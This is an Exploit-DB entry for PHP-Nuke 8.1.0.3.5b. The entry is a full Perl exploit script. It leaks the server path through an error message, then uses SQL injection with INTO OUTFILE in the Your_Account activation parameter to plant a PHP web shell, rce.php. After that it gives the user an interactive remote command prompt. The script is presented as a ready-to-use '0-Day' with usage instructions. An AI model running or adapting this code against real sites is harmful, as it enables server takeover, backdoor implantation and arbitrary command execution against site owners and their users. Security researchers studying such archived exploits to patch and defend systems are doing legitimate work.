PHP-Nuke 8.1.0.3.5b - Remote Command Execution

EDB-ID:

14319

CVE:

N/A


Author:

yawn

Type:

webapps


Platform:

PHP

Date:

2010-07-10


# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net

#	You will remember, Watson, how the dreadful business of the
#   	Abernetty family was first brought to my notice by the depth which the
#   	parsley had sunk into the butter upon a hot day.
#		                                        -- Sherlock Holmes

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

sub Nuke::Usage {
	print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";
	print " ------------------------------------------------------ \n";
	print " * USAGE:                                             *\n";
	print " * cd [Local Disk]:\\                                  *\n";
	print " * perl name_exploit.pl [host] [username] [password]  *\n";
	print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-  *\n";
	print " ------------------------------------------------------ \n";
	print " *             Powered By Dante90 & yawn              *\n";
	print " *  	               www.unitx.net                  *\n";
	print " ------------------------------------------------------ \n";
}

#VARS
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to
Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
sub Full_Path_Disclosure() {
	my $Get = $request->get($host.'themes/NukeNews/theme.php');
	if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {
		return $1;
	} else {
		return "failed";
	}
}

print " * Getting Full Path\n";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;
print " * Full Path Found: $path\n";
if ($path =~ m/\\/) {
	$path =~ s/\\/\\\\\\\\/g;
}
print " * Injecting Shell To $host\n";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
	{
		check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
`nuke_authors` INTO OUTFILE '$path"."rce.php",
	},
	Referer => $host."index.php");
print " * Injecting Successfully Completed\n";
print " * Shell now available on $host"."rce.php\n";
print " * Connecting to remote shell\n";
sleep(4);
print " * Connected.. Type \"quit\" to quit\n";
while() {
		print "* root\@backdoor ~\$ ";
		$cmd = <>;
		chomp($cmd);
		last if $cmd eq "quit";
		$req2 = $request->get($host."/rce.php?cmd=".$cmd);
		print $req2->content."\n";
}